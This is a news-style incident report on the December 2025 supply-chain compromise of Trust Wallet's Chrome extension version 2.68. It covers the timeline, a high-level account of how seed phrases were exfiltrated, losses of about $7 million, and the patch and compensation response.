Trust Wallet Browser Extension Breach Drains $7M From Users

Incident Overview

On December 26, 2025, reports emerged of mass unauthorized withdrawals from Trust Wallet’s Chrome browser extension, version 2.68. Within hours of a routine update, attackers deployed malicious code within the extension that silently captured seed phrases and private keys. Victims reported sudden drains of funds across multiple chains, with preliminary on-chain analysis indicating losses of around $7 million.

Attack Vector and Timeline

• December 24 2025: Version 2.68 released via Chrome Web Store.
• December 26 2025, 00:15 UTC: Blockchain sleuth ZachXBT alerts community after observing rapid fund movements from diverse wallets.
• December 26 2025, 02:00 UTC: PeckShield confirms siphoning of >$6 million, with ~40% of stolen assets laundered through centralized exchanges.
• December 26 2025, 04:30 UTC: Trust Wallet issues advisory to disable version 2.68 and upgrade to patched version 2.69.
• December 26 2025, 07:42 UTC: Trust Wallet confirms total losses of ~$7 million and pledges full user compensation.

Technical Analysis

Attackers embedded a supply-chain backdoor by injecting PostHog JS instrumentation into the extension’s core scripts. This enabled real-time exfiltration of decrypted seed phrases and private key material to a malicious endpoint. On-chain clustering reveals that stolen assets were split across Bitcoin, Ethereum, Solana, and other EVM-compatible tokens, with proceeds aggregated into a small set of withdrawal addresses before distribution to exchanges for conversion to fiat.

Mitigation and Response

Trust Wallet released version 2.69, which removed the malicious code and rotated critical signatures used in extension updates. Affected users were urged to revoke extension permissions, transfer remaining assets to fresh wallets, and enable two-factor authentication where available. Binance founder Changpeng Zhao (CZ) publicly guaranteed reimbursement under the SAFU fund. Independent security firms are auditing the codebase and monitoring for residual vulnerabilities.

Broader Implications

This incident underscores the heightened risk surrounding browser-based wallet extensions. Unlike hardware or fully standalone desktop clients, browser extensions operate within the security context of the browser, increasing their attack surface. Experts recommend use of hardware wallets or account-abstraction solutions that enforce transaction delays and require explicit user approvals for code-level changes.

Key Takeaways

1. Supply-chain compromise can inject malicious code directly into legitimate software updates.
2. Rapid advisory and patch rollout, combined with public compensation guarantees, are critical for damage control.
3. Browser-extension environments remain vulnerable; users should consider hardware or multi-sig alternatives for large holdings.